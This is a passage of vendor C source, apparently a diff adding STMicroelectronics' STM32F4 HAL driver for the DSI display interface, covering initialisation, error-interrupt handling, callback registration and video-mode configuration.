****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_DSI_MODULE_ENABLED + +#if defined(DSI) + +/** @addtogroup DSI + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private defines -----------------------------------------------------------*/ +/** @addtogroup DSI_Private_Constants + * @{ + */ +#define DSI_TIMEOUT_VALUE ((uint32_t)1000U) /* 1s */ + +#define DSI_ERROR_ACK_MASK (DSI_ISR0_AE0 | DSI_ISR0_AE1 | DSI_ISR0_AE2 | DSI_ISR0_AE3 | \ + DSI_ISR0_AE4 | DSI_ISR0_AE5 | DSI_ISR0_AE6 | DSI_ISR0_AE7 | \ + DSI_ISR0_AE8 | DSI_ISR0_AE9 | DSI_ISR0_AE10 | DSI_ISR0_AE11 | \ + DSI_ISR0_AE12 | DSI_ISR0_AE13 | DSI_ISR0_AE14 | DSI_ISR0_AE15) +#define DSI_ERROR_PHY_MASK (DSI_ISR0_PE0 | DSI_ISR0_PE1 | DSI_ISR0_PE2 | DSI_ISR0_PE3 | DSI_ISR0_PE4) +#define DSI_ERROR_TX_MASK DSI_ISR1_TOHSTX +#define DSI_ERROR_RX_MASK DSI_ISR1_TOLPRX +#define DSI_ERROR_ECC_MASK (DSI_ISR1_ECCSE | DSI_ISR1_ECCME) +#define DSI_ERROR_CRC_MASK DSI_ISR1_CRCE +#define DSI_ERROR_PSE_MASK DSI_ISR1_PSE +#define DSI_ERROR_EOT_MASK DSI_ISR1_EOTPE +#define DSI_ERROR_OVF_MASK DSI_ISR1_LPWRE +#define DSI_ERROR_GEN_MASK (DSI_ISR1_GCWRE | DSI_ISR1_GPWRE | DSI_ISR1_GPTXE | DSI_ISR1_GPRDE | DSI_ISR1_GPRXE) +/** + * @} + */ + +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/* Private macros ------------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +static void DSI_ConfigPacketHeader(DSI_TypeDef *DSIx, uint32_t ChannelID, uint32_t DataType, uint32_t Data0, + uint32_t Data1); + +static HAL_StatusTypeDef DSI_ShortWrite(DSI_HandleTypeDef *hdsi, + uint32_t ChannelID, + uint32_t Mode, + uint32_t Param1, + uint32_t Param2); + +/* Private functions ---------------------------------------------------------*/ +/** + * @brief Generic DSI packet header configuration + * @param DSIx Pointer to DSI register base + * @param ChannelID Virtual channel ID of the header packet + * @param DataType Packet data type of the header packet + * This parameter can be any value of : + * @arg DSI_SHORT_WRITE_PKT_Data_Type + * @arg DSI_LONG_WRITE_PKT_Data_Type + * @arg DSI_SHORT_READ_PKT_Data_Type + * @arg DSI_MAX_RETURN_PKT_SIZE + * @param Data0 Word count LSB + * @param Data1 Word count MSB + * @retval None + */ +static void DSI_ConfigPacketHeader(DSI_TypeDef *DSIx, + uint32_t ChannelID, + uint32_t DataType, + uint32_t Data0, + uint32_t Data1) +{ + /* Update the DSI packet header with new information */ + DSIx->GHCR = (DataType | (ChannelID << 6U) | (Data0 << 8U) | (Data1 << 16U)); +} + +/** + * @brief write short DCS or short Generic command + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param ChannelID Virtual channel ID. + * @param Mode DSI short packet data type. + * This parameter can be any value of @arg DSI_SHORT_WRITE_PKT_Data_Type. + * @param Param1 DSC command or first generic parameter. + * This parameter can be any value of @arg DSI_DCS_Command or a + * generic command code. + * @param Param2 DSC parameter or second generic parameter. + * @retval HAL status + */ +static HAL_StatusTypeDef DSI_ShortWrite(DSI_HandleTypeDef *hdsi, + uint32_t ChannelID, + uint32_t Mode, + uint32_t Param1, + uint32_t Param2) +{ + uint32_t tickstart; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait for Command FIFO Empty */ + while((hdsi->Instance->GPSR & DSI_GPSR_CMDFE) == 0U) + { + /* Check for the Timeout */ + if((HAL_GetTick() - tickstart ) > DSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Configure the packet to send a short DCS command with 0 or 1 parameter */ + /* Update the DSI packet header with new information */ + hdsi->Instance->GHCR = (Mode | (ChannelID << 6U) | (Param1 << 8U) | (Param2 << 16U)); + + return HAL_OK; +} + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup DSI_Exported_Functions + * @{ + */ + +/** @defgroup DSI_Group1 Initialization and Configuration functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and Configuration functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the DSI + (+) De-initialize the DSI + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the DSI according to the specified + * parameters in the DSI_InitTypeDef and create the associated handle. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param PLLInit pointer to a DSI_PLLInitTypeDef structure that contains + * the PLL Clock structure definition for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_Init(DSI_HandleTypeDef *hdsi, DSI_PLLInitTypeDef *PLLInit) +{ + uint32_t tickstart; + uint32_t unitIntervalx4; + uint32_t tempIDF; + + /* Check the DSI handle allocation */ + if (hdsi == NULL) + { + return HAL_ERROR; + } + + /* Check function parameters */ + assert_param(IS_DSI_PLL_NDIV(PLLInit->PLLNDIV)); + assert_param(IS_DSI_PLL_IDF(PLLInit->PLLIDF)); + assert_param(IS_DSI_PLL_ODF(PLLInit->PLLODF)); + assert_param(IS_DSI_AUTO_CLKLANE_CONTROL(hdsi->Init.AutomaticClockLaneControl)); + assert_param(IS_DSI_NUMBER_OF_LANES(hdsi->Init.NumberOfLanes)); + +#if (USE_HAL_DSI_REGISTER_CALLBACKS == 1) + if (hdsi->State == HAL_DSI_STATE_RESET) + { + /* Reset the DSI callback to the legacy weak callbacks */ + hdsi->TearingEffectCallback = HAL_DSI_TearingEffectCallback; /* Legacy weak TearingEffectCallback */ + hdsi->EndOfRefreshCallback = HAL_DSI_EndOfRefreshCallback; /* Legacy weak EndOfRefreshCallback */ + hdsi->ErrorCallback = HAL_DSI_ErrorCallback; /* Legacy weak ErrorCallback */ + + if (hdsi->MspInitCallback == NULL) + { + hdsi->MspInitCallback = HAL_DSI_MspInit; + } + /* Initialize the low level hardware */ + hdsi->MspInitCallback(hdsi); + } +#else + if (hdsi->State == HAL_DSI_STATE_RESET) + { + /* Initialize the low level hardware */ + HAL_DSI_MspInit(hdsi); + } +#endif /* USE_HAL_DSI_REGISTER_CALLBACKS */ + + /* Change DSI peripheral state */ + hdsi->State = HAL_DSI_STATE_BUSY; + + /**************** Turn on the regulator and enable the DSI PLL ****************/ + + /* Enable the regulator */ + __HAL_DSI_REG_ENABLE(hdsi); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until the regulator is ready */ + while (__HAL_DSI_GET_FLAG(hdsi, DSI_FLAG_RRS) == 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Set the PLL division factors */ + hdsi->Instance->WRPCR &= ~(DSI_WRPCR_PLL_NDIV | DSI_WRPCR_PLL_IDF | DSI_WRPCR_PLL_ODF); + hdsi->Instance->WRPCR |= (((PLLInit->PLLNDIV) << 2U) | ((PLLInit->PLLIDF) << 11U) | ((PLLInit->PLLODF) << 16U)); + + /* Enable the DSI PLL */ + __HAL_DSI_PLL_ENABLE(hdsi); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait for the lock of the PLL */ + while (__HAL_DSI_GET_FLAG(hdsi, DSI_FLAG_PLLLS) == 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /*************************** Set the PHY parameters ***************************/ + + /* D-PHY clock and digital enable*/ + hdsi->Instance->PCTLR |= (DSI_PCTLR_CKE | DSI_PCTLR_DEN); + + /* Clock lane configuration */ + hdsi->Instance->CLCR &= ~(DSI_CLCR_DPCC | DSI_CLCR_ACR); + hdsi->Instance->CLCR |= (DSI_CLCR_DPCC | hdsi->Init.AutomaticClockLaneControl); + + /* Configure the number of active data lanes */ + hdsi->Instance->PCONFR &= ~DSI_PCONFR_NL; + hdsi->Instance->PCONFR |= hdsi->Init.NumberOfLanes; + + /************************ Set the DSI clock parameters ************************/ + + /* Set the TX escape clock division factor */ + hdsi->Instance->CCR &= ~DSI_CCR_TXECKDIV; + hdsi->Instance->CCR |= hdsi->Init.TXEscapeCkdiv; + + /* Calculate the bit period in high-speed mode in unit of 0.25 ns (UIX4) */ + /* The equation is : UIX4 = IntegerPart( (1000/F_PHY_Mhz) * 4 ) */ + /* Where : F_PHY_Mhz = (NDIV * HSE_Mhz) / (IDF * ODF) */ + tempIDF = (PLLInit->PLLIDF > 0U) ? PLLInit->PLLIDF : 1U; + unitIntervalx4 = (4000000U * tempIDF * ((1UL << (0x3U & PLLInit->PLLODF)))) / ((HSE_VALUE / 1000U) * PLLInit->PLLNDIV); + + /* Set the bit period in high-speed mode */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_UIX4; + hdsi->Instance->WPCR[0U] |= unitIntervalx4; + + /****************************** Error management *****************************/ + + /* Disable all error interrupts and reset the Error Mask */ + hdsi->Instance->IER[0U] = 0U; + hdsi->Instance->IER[1U] = 0U; + hdsi->ErrorMsk = 0U; + + /* Initialise the error code */ + hdsi->ErrorCode = HAL_DSI_ERROR_NONE; + + /* Initialize the DSI state*/ + hdsi->State = HAL_DSI_STATE_READY; + + return HAL_OK; +} + +/** + * @brief De-initializes the DSI peripheral registers to their default reset + * values. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_DeInit(DSI_HandleTypeDef *hdsi) +{ + /* Check the DSI handle allocation */ + if (hdsi == NULL) + { + return HAL_ERROR; + } + + /* Change DSI peripheral state */ + hdsi->State = HAL_DSI_STATE_BUSY; + + /* Disable the DSI wrapper */ + __HAL_DSI_WRAPPER_DISABLE(hdsi); + + /* Disable the DSI host */ + __HAL_DSI_DISABLE(hdsi); + + /* D-PHY clock and digital disable */ + hdsi->Instance->PCTLR &= ~(DSI_PCTLR_CKE | DSI_PCTLR_DEN); + + /* Turn off the DSI PLL */ + __HAL_DSI_PLL_DISABLE(hdsi); + + /* Disable the regulator */ + __HAL_DSI_REG_DISABLE(hdsi); + +#if (USE_HAL_DSI_REGISTER_CALLBACKS == 1) + if (hdsi->MspDeInitCallback == NULL) + { + hdsi->MspDeInitCallback = HAL_DSI_MspDeInit; + } + /* DeInit the low level hardware */ + hdsi->MspDeInitCallback(hdsi); +#else + /* DeInit the low level hardware */ + HAL_DSI_MspDeInit(hdsi); +#endif /* USE_HAL_DSI_REGISTER_CALLBACKS */ + + /* Initialise the error code */ + hdsi->ErrorCode = HAL_DSI_ERROR_NONE; + + /* Initialize the DSI state*/ + hdsi->State = HAL_DSI_STATE_RESET; + + /* Release Lock */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Enable the error monitor flags + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param ActiveErrors indicates which error interrupts will be enabled. + * This parameter can be any combination of @arg DSI_Error_Data_Type. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ConfigErrorMonitor(DSI_HandleTypeDef *hdsi, uint32_t ActiveErrors) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + hdsi->Instance->IER[0U] = 0U; + hdsi->Instance->IER[1U] = 0U; + + /* Store active errors to the handle */ + hdsi->ErrorMsk = ActiveErrors; + + if ((ActiveErrors & HAL_DSI_ERROR_ACK) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[0U] |= DSI_ERROR_ACK_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_PHY) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[0U] |= DSI_ERROR_PHY_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_TX) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_TX_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_RX) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_RX_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_ECC) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_ECC_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_CRC) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_CRC_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_PSE) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_PSE_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_EOT) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_EOT_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_OVF) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_OVF_MASK; + } + + if ((ActiveErrors & HAL_DSI_ERROR_GEN) != 0U) + { + /* Enable the interrupt generation on selected errors */ + hdsi->Instance->IER[1U] |= DSI_ERROR_GEN_MASK; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Initializes the DSI MSP. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval None + */ +__weak void HAL_DSI_MspInit(DSI_HandleTypeDef *hdsi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdsi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DSI_MspInit could be implemented in the user file + */ +} + +/** + * @brief De-initializes the DSI MSP. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval None + */ +__weak void HAL_DSI_MspDeInit(DSI_HandleTypeDef *hdsi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdsi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DSI_MspDeInit could be implemented in the user file + */ +} + +#if (USE_HAL_DSI_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User DSI Callback + * To be used instead of the weak predefined callback + * @param hdsi dsi handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg HAL_DSI_TEARING_EFFECT_CB_ID Tearing Effect Callback ID + * @arg HAL_DSI_ENDOF_REFRESH_CB_ID End Of Refresh Callback ID + * @arg HAL_DSI_ERROR_CB_ID Error Callback ID + * @arg HAL_DSI_MSPINIT_CB_ID MspInit callback ID + * @arg HAL_DSI_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval status + */ +HAL_StatusTypeDef HAL_DSI_RegisterCallback(DSI_HandleTypeDef *hdsi, HAL_DSI_CallbackIDTypeDef CallbackID, + pDSI_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hdsi->ErrorCode |= HAL_DSI_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hdsi); + + if (hdsi->State == HAL_DSI_STATE_READY) + { + switch (CallbackID) + { + case HAL_DSI_TEARING_EFFECT_CB_ID : + hdsi->TearingEffectCallback = pCallback; + break; + + case HAL_DSI_ENDOF_REFRESH_CB_ID : + hdsi->EndOfRefreshCallback = pCallback; + break; + + case HAL_DSI_ERROR_CB_ID : + hdsi->ErrorCallback = pCallback; + break; + + case HAL_DSI_MSPINIT_CB_ID : + hdsi->MspInitCallback = pCallback; + break; + + case HAL_DSI_MSPDEINIT_CB_ID : + hdsi->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hdsi->ErrorCode |= HAL_DSI_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hdsi->State == HAL_DSI_STATE_RESET) + { + switch (CallbackID) + { + case HAL_DSI_MSPINIT_CB_ID : + hdsi->MspInitCallback = pCallback; + break; + + case HAL_DSI_MSPDEINIT_CB_ID : + hdsi->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hdsi->ErrorCode |= HAL_DSI_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hdsi->ErrorCode |= HAL_DSI_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdsi); + + return status; +} + +/** + * @brief Unregister a DSI Callback + * DSI callabck is redirected to the weak predefined callback + * @param hdsi dsi handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg HAL_DSI_TEARING_EFFECT_CB_ID Tearing Effect Callback ID + * @arg HAL_DSI_ENDOF_REFRESH_CB_ID End Of Refresh Callback ID + * @arg HAL_DSI_ERROR_CB_ID Error Callback ID + * @arg HAL_DSI_MSPINIT_CB_ID MspInit callback ID + * @arg HAL_DSI_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval status + */ +HAL_StatusTypeDef HAL_DSI_UnRegisterCallback(DSI_HandleTypeDef *hdsi, HAL_DSI_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hdsi); + + if (hdsi->State == HAL_DSI_STATE_READY) + { + switch (CallbackID) + { + case HAL_DSI_TEARING_EFFECT_CB_ID : + hdsi->TearingEffectCallback = HAL_DSI_TearingEffectCallback; /* Legacy weak TearingEffectCallback */ + break; + + case HAL_DSI_ENDOF_REFRESH_CB_ID : + hdsi->EndOfRefreshCallback = HAL_DSI_EndOfRefreshCallback; /* Legacy weak EndOfRefreshCallback */ + break; + + case HAL_DSI_ERROR_CB_ID : + hdsi->ErrorCallback = HAL_DSI_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_DSI_MSPINIT_CB_ID : + hdsi->MspInitCallback = HAL_DSI_MspInit; /* Legcay weak MspInit Callback */ + break; + + case HAL_DSI_MSPDEINIT_CB_ID : + hdsi->MspDeInitCallback = HAL_DSI_MspDeInit; /* Legcay weak MspDeInit Callback */ + break; + + default : + /* Update the error code */ + hdsi->ErrorCode |= HAL_DSI_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hdsi->State == HAL_DSI_STATE_RESET) + { + switch (CallbackID) + { + case HAL_DSI_MSPINIT_CB_ID : + hdsi->MspInitCallback = HAL_DSI_MspInit; /* Legcay weak MspInit Callback */ + break; + + case HAL_DSI_MSPDEINIT_CB_ID : + hdsi->MspDeInitCallback = HAL_DSI_MspDeInit; /* Legcay weak MspDeInit Callback */ + break; + + default : + /* Update the error code */ + hdsi->ErrorCode |= HAL_DSI_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hdsi->ErrorCode |= HAL_DSI_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hdsi); + + return status; +} +#endif /* USE_HAL_DSI_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup DSI_Group2 IO operation functions + * @brief IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This section provides function allowing to: + (+) Handle DSI interrupt request + +@endverbatim + * @{ + */ +/** + * @brief Handles DSI interrupt request. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +void HAL_DSI_IRQHandler(DSI_HandleTypeDef *hdsi) +{ + uint32_t ErrorStatus0, ErrorStatus1; + + /* Tearing Effect Interrupt management ***************************************/ + if (__HAL_DSI_GET_FLAG(hdsi, DSI_FLAG_TE) != 0U) + { + if (__HAL_DSI_GET_IT_SOURCE(hdsi, DSI_IT_TE) != 0U) + { + /* Clear the Tearing Effect Interrupt Flag */ + __HAL_DSI_CLEAR_FLAG(hdsi, DSI_FLAG_TE); + + /* Tearing Effect Callback */ +#if (USE_HAL_DSI_REGISTER_CALLBACKS == 1) + /*Call registered Tearing Effect callback */ + hdsi->TearingEffectCallback(hdsi); +#else + /*Call legacy Tearing Effect callback*/ + HAL_DSI_TearingEffectCallback(hdsi); +#endif /* USE_HAL_DSI_REGISTER_CALLBACKS */ + } + } + + /* End of Refresh Interrupt management ***************************************/ + if (__HAL_DSI_GET_FLAG(hdsi, DSI_FLAG_ER) != 0U) + { + if (__HAL_DSI_GET_IT_SOURCE(hdsi, DSI_IT_ER) != 0U) + { + /* Clear the End of Refresh Interrupt Flag */ + __HAL_DSI_CLEAR_FLAG(hdsi, DSI_FLAG_ER); + + /* End of Refresh Callback */ +#if (USE_HAL_DSI_REGISTER_CALLBACKS == 1) + /*Call registered End of refresh callback */ + hdsi->EndOfRefreshCallback(hdsi); +#else + /*Call Legacy End of refresh callback */ + HAL_DSI_EndOfRefreshCallback(hdsi); +#endif /* USE_HAL_DSI_REGISTER_CALLBACKS */ + } + } + + /* Error Interrupts management ***********************************************/ + if (hdsi->ErrorMsk != 0U) + { + ErrorStatus0 = hdsi->Instance->ISR[0U]; + ErrorStatus0 &= hdsi->Instance->IER[0U]; + ErrorStatus1 = hdsi->Instance->ISR[1U]; + ErrorStatus1 &= hdsi->Instance->IER[1U]; + + if ((ErrorStatus0 & DSI_ERROR_ACK_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_ACK; + } + + if ((ErrorStatus0 & DSI_ERROR_PHY_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_PHY; + } + + if ((ErrorStatus1 & DSI_ERROR_TX_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_TX; + } + + if ((ErrorStatus1 & DSI_ERROR_RX_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_RX; + } + + if ((ErrorStatus1 & DSI_ERROR_ECC_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_ECC; + } + + if ((ErrorStatus1 & DSI_ERROR_CRC_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_CRC; + } + + if ((ErrorStatus1 & DSI_ERROR_PSE_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_PSE; + } + + if ((ErrorStatus1 & DSI_ERROR_EOT_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_EOT; + } + + if ((ErrorStatus1 & DSI_ERROR_OVF_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_OVF; + } + + if ((ErrorStatus1 & DSI_ERROR_GEN_MASK) != 0U) + { + hdsi->ErrorCode |= HAL_DSI_ERROR_GEN; + } + + /* Check only selected errors */ + if (hdsi->ErrorCode != HAL_DSI_ERROR_NONE) + { + /* DSI error interrupt callback */ +#if (USE_HAL_DSI_REGISTER_CALLBACKS == 1) + /*Call registered Error callback */ + hdsi->ErrorCallback(hdsi); +#else + /*Call Legacy Error callback */ + HAL_DSI_ErrorCallback(hdsi); +#endif /* USE_HAL_DSI_REGISTER_CALLBACKS */ + } + } +} + +/** + * @brief Tearing Effect DSI callback. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval None + */ +__weak void HAL_DSI_TearingEffectCallback(DSI_HandleTypeDef *hdsi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdsi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DSI_TearingEffectCallback could be implemented in the user file + */ +} + +/** + * @brief End of Refresh DSI callback. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval None + */ +__weak void HAL_DSI_EndOfRefreshCallback(DSI_HandleTypeDef *hdsi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdsi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DSI_EndOfRefreshCallback could be implemented in the user file + */ +} + +/** + * @brief Operation Error DSI callback. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval None + */ +__weak void HAL_DSI_ErrorCallback(DSI_HandleTypeDef *hdsi) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hdsi); + /* NOTE : This function Should not be modified, when the callback is needed, + the HAL_DSI_ErrorCallback could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup DSI_Group3 Peripheral Control functions + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Configure the Generic interface read-back Virtual Channel ID + (+) Select video mode and configure the corresponding parameters + (+) Configure command transmission mode: High-speed or Low-power + (+) Configure the flow control + (+) Configure the DSI PHY timer + (+) Configure the DSI HOST timeout + (+) Configure the DSI HOST timeout + (+) Start/Stop the DSI module + (+) Refresh the display in command mode + (+) Controls the display color mode in Video mode + (+) Control the display shutdown in Video mode + (+) write short DCS or short Generic command + (+) write long DCS or long Generic command + (+) Read command (DCS or generic) + (+) Enter/Exit the Ultra Low Power Mode on data only (D-PHY PLL running) + (+) Enter/Exit the Ultra Low Power Mode on data only and clock (D-PHY PLL turned off) + (+) Start/Stop test pattern generation + (+) Slew-Rate And Delay Tuning + (+) Low-Power Reception Filter Tuning + (+) Activate an additional current path on all lanes to meet the SDDTx parameter + (+) Custom lane pins configuration + (+) Set custom timing for the PHY + (+) Force the Clock/Data Lane in TX Stop Mode + (+) Force LP Receiver in Low-Power Mode + (+) Force Data Lanes in RX Mode after a BTA + (+) Enable a pull-down on the lanes to prevent from floating states when unused + (+) Switch off the contention detection on data lanes + +@endverbatim + * @{ + */ + +/** + * @brief Configure the Generic interface read-back Virtual Channel ID. + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param VirtualChannelID Virtual channel ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetGenericVCID(DSI_HandleTypeDef *hdsi, uint32_t VirtualChannelID) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Update the GVCID register */ + hdsi->Instance->GVCIDR &= ~DSI_GVCIDR_VCID; + hdsi->Instance->GVCIDR |= VirtualChannelID; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Select video mode and configure the corresponding parameters + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param VidCfg pointer to a DSI_VidCfgTypeDef structure that contains + * the DSI video mode configuration parameters + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ConfigVideoMode(DSI_HandleTypeDef *hdsi, DSI_VidCfgTypeDef *VidCfg) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check the parameters */ + assert_param(IS_DSI_COLOR_CODING(VidCfg->ColorCoding)); + assert_param(IS_DSI_VIDEO_MODE_TYPE(VidCfg->Mode)); + assert_param(IS_DSI_LP_COMMAND(VidCfg->LPCommandEnable)); + assert_param(IS_DSI_LP_HFP(VidCfg->LPHorizontalFrontPorchEnable)); + assert_param(IS_DSI_LP_HBP(VidCfg->LPHorizontalBackPorchEnable)); + assert_param(IS_DSI_LP_VACTIVE(VidCfg->LPVerticalActiveEnable)); + assert_param(IS_DSI_LP_VFP(VidCfg->LPVerticalFrontPorchEnable)); + assert_param(IS_DSI_LP_VBP(VidCfg->LPVerticalBackPorchEnable)); + assert_param(IS_DSI_LP_VSYNC(VidCfg->LPVerticalSyncActiveEnable)); + assert_param(IS_DSI_FBTAA(VidCfg->FrameBTAAcknowledgeEnable)); + assert_param(IS_DSI_DE_POLARITY(VidCfg->DEPolarity)); + assert_param(IS_DSI_VSYNC_POLARITY(VidCfg->VSPolarity)); + assert_param(IS_DSI_HSYNC_POLARITY(VidCfg->HSPolarity)); + /* Check the LooselyPacked variant only in 18-bit mode */ + if (VidCfg->ColorCoding == DSI_RGB666) + { + assert_param(IS_DSI_LOOSELY_PACKED(VidCfg->LooselyPacked)); + } + + /* Select video mode by resetting CMDM and DSIM bits */ + hdsi->Instance->MCR &= ~DSI_MCR_CMDM; + hdsi->Instance->WCFGR &= ~DSI_WCFGR_DSIM; + + /* Configure the video mode transmission type */ + hdsi->Instance->VMCR &= ~DSI_VMCR_VMT; + hdsi->Instance->VMCR |= VidCfg->Mode; + + /* Configure the video packet size */ + hdsi->Instance->VPCR &= ~DSI_VPCR_VPSIZE; + hdsi->Instance->VPCR |= VidCfg->PacketSize; + + /* Set the chunks number to be transmitted through the DSI link */ + hdsi->Instance->VCCR &= ~DSI_VCCR_NUMC; + hdsi->Instance->VCCR |= VidCfg->NumberOfChunks; + + /* Set the size of the null packet */ + hdsi->Instance->VNPCR &= ~DSI_VNPCR_NPSIZE; + hdsi->Instance->VNPCR |= VidCfg->NullPacketSize; + + /* Select the virtual channel for the LTDC interface traffic */ + hdsi->Instance->LVCIDR &= ~DSI_LVCIDR_VCID; + 